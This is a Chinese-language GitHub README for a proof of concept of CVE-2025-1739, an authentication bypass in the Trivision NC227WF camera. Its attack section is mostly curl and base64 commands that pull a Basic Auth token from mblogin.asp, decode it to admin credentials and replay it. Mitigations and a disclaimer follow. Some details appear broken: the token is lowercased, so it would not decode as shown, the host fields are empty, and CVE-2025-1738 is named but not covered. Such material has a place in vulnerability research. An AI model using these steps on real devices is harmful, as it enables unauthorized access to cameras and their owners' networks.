n0n4m3x41/CVE-2025-1739

GitHub: n0n4m3x41/CVE-2025-1739

CVE-2025-1739的公开PoC,演示Trivision NC227WF摄像头通过mblogin.asp端点泄露Base64编码的Basic Auth令牌从而绕过身份验证的漏洞。

Stars: 0 | Forks: 0

# CVE-2025-1738 & CVE-2025-1739 — Trivision Camera NC227WF PoC

## 📋 概述 | CVE | CVSS v3.1 | 评分 | CWE | 类型 | |---|---|---|---|---| | CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | 通过 Basic Auth 泄露绕过身份验证 | ## 🔓 CVE-2025-1739 — Basic Auth 代码泄露 / 身份验证绕过 (CWE-288) ### 描述 摄像机通过 `mblogin.asp` 端点泄露了一个**有效的 Base64 编码的 Basic Authentication 令牌**。该令牌可以轻松解码并被重用以获得对设备的未授权访问——无需了解密码。 - **攻击向量:** 邻近网络 (AV:A) - **CVSS 评分:** 7.1 - **CWE:** CWE-288(使用替代路径或通道绕过身份验证) ### 载荷 ``` curl -u admin:whatever http://: --request-target en/mobile/mblogin.asp ``` image ### 示例响应 响应包含一个有效的 Basic Auth 令牌: ``` ywrtaw46vw5ndwvzc2fibguxmjmh ``` ### 解码令牌 ``` echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d # Output: admin:unguessable123! ``` ### 重放令牌 ``` curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://:/ ``` ## 🛡️ 缓解措施 - **升级固件**:如果 Trivision 有可用的补丁版本。 - **隔离摄像机**:将其放在专用 VLAN 中,不提供外部访问。 - **防火墙保护**:从不信任的网络段阻止摄像机的管理端口。 - **更改默认凭据**并定期轮换密码。 - 监控对 `activex_pal.asp` 和 `mblogin.asp` 的异常访问。 ## ⚖️ 免责声明 本仓库仅用于**教育和授权的安全研究**。作者不对任何滥用行为负责。在测试任何设备之前务必获得明确授权。
标签:0day, Base64编码, Basic Auth, CVE-2025-1738, CVE-2025-1739, CWE-288, IoT漏洞, NC227WF, PoC, StruQ, Trivision, 凭证泄露, 固件漏洞, 固件版本5.80, 弱认证, 摄像头漏洞, 智能设备安全, 暴力破解, 未授权访问, 物联网安全, 网络摄像机, 认证绕过, 身份验证绕过